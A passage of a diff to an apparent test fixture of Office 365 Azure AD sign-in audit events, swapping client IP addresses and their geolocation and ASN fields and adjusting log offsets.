-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -4578,8 +4503,8 @@
     },
     {
         "@timestamp": "2020-02-12T10:51:49.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -4597,7 +4522,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 66208,
+        "log.offset": 66124,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4614,10 +4539,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T10:51:49",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -4646,20 +4571,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -4677,8 +4601,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:43:37.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -4696,7 +4620,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 67601,
+        "log.offset": 67517,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4713,10 +4637,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "e48d4214-364e-4731-b2b6-47dabf529218",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:43:37",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -4745,20 +4669,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -4776,8 +4698,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:13:36.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -4795,7 +4717,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 69051,
+        "log.offset": 68963,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4812,10 +4734,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:13:36",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -4844,20 +4766,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -4875,8 +4795,8 @@
     },
     {
         "@timestamp": "2020-02-12T21:38:37.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -4894,7 +4814,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 70444,
+        "log.offset": 70354,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4911,10 +4831,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T21:38:37",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -4943,20 +4863,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -4974,8 +4893,8 @@
     },
     {
         "@timestamp": "2020-02-06T09:28:00.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -4993,7 +4912,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 71895,
+        "log.offset": 71805,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5010,10 +4929,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-06T09:28:00",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -5042,20 +4961,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -5073,8 +4990,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:28:52.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -5092,7 +5009,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 73345,
+        "log.offset": 73253,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5109,10 +5026,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:28:52",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -5141,20 +5058,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -5172,8 +5087,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:13:37.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -5191,7 +5106,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 74795,
+        "log.offset": 74701,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5208,10 +5123,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:13:37",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -5240,20 +5155,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -5271,8 +5184,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:28:52.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -5290,7 +5203,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 76246,
+        "log.offset": 76150,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5307,10 +5220,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:28:52",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -5339,20 +5252,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -5370,8 +5281,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:13:01.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -5389,7 +5300,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 77696,
+        "log.offset": 77598,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5406,10 +5317,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:13:01",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -5438,20 +5349,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -5469,8 +5378,8 @@
     },
     {
         "@timestamp": "2020-02-12T10:53:12.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -5488,7 +5397,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 79146,
+        "log.offset": 79046,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5505,10 +5414,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T10:53:12",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -5537,20 +5446,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -5568,8 +5476,8 @@
     },
     {
         "@timestamp": "2020-02-12T10:52:06.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -5587,7 +5495,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 80596,
+        "log.offset": 80496,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5604,10 +5512,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T10:52:06",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -5636,20 +5544,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -5667,8 +5574,8 @@
     },
     {
         "@timestamp": "2020-02-08T14:33:50.000Z",
-        "client.address": "37.29.234.179",
-        "client.ip": "37.29.234.179",
+        "client.address": "67.43.156.12",
+        "client.ip": "67.43.156.12",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -5686,7 +5593,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 82047,
+        "log.offset": 81947,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -5703,10 +5610,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "37.29.234.179",
+        "o365.audit.ActorIpAddress": "67.43.156.12",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "37.29.234.179",
+        "o365.audit.ClientIP": "67.43.156.12",
         "o365.audit.CreationTime": "2020-02-08T14:33:50",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -5735,17 +5642,16 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "37.29.234.179",
+        "related.ip": "67.43.156.12",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 16299,
-        "source.as.organization.name": "XFERA Moviles S.A.",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.4172,
-        "source.geo.location.lon": -3.684,
-        "source.ip": "37.29.234.179",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
